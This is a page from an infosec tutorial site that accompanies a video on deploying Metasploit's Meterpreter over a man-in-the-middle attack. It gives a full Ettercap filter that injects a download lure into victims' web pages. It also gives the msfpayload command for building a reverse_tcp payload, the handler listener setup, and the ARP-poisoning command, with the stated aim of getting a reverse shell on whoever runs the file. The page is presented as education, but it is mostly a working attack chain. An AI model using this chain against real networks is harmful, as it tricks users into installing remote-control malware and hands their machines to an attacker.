A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Affiliates:
ISDPodcast Button
RootSecure Button
Social-engineer-training Button
Irongeek Button

Web Hosting:
Dreamhost Logo
Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle


Deploying Metasploit's Meterpreter with MITM and an Ettercap filter (Hacking Illustrated Series InfoSec Tutorial Videos)

Deploying Metasploit's Meterpreter with MITM and an Ettercap filter


In this video, Bigmac shows how to redirect web traffic and trick users into downloading Meterpreter and running it on their box.

 
ettercap filter html injection. meterpreter payload from bigmac on Vimeo.

 

save this as html.filter
 

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Nothing!");
      }
}

if (ip.proto == TCP && tcp.src == 80) {
      if (search(DATA.data, "<title>")) {
           replace("</title>", "</title><form
 action="http://192.168.1.6/meterpeter.exe" method="link"><img src="http://192.168.1.6/alert.gif"><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form><html><body><h10>just some instructions</h10></body></html>");
           msg("html injected");
      }}

 

-create the meterpeter.exe-
(open msfconsole)
../msfpayload windows/meterpeter/reverse_tcp LHOST=192.168.1.6 LPORT=100 x > meterpeter.exe
Now place the executable into your Apache root directory

-set up your listener-
use exploit/multi/handler
set PAYLOAD windows/meterpeter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 100

-execute ettercap-
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //

now wait for some one on the network to download and execute meterpeter.exe and you will have a reverse shell

 

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast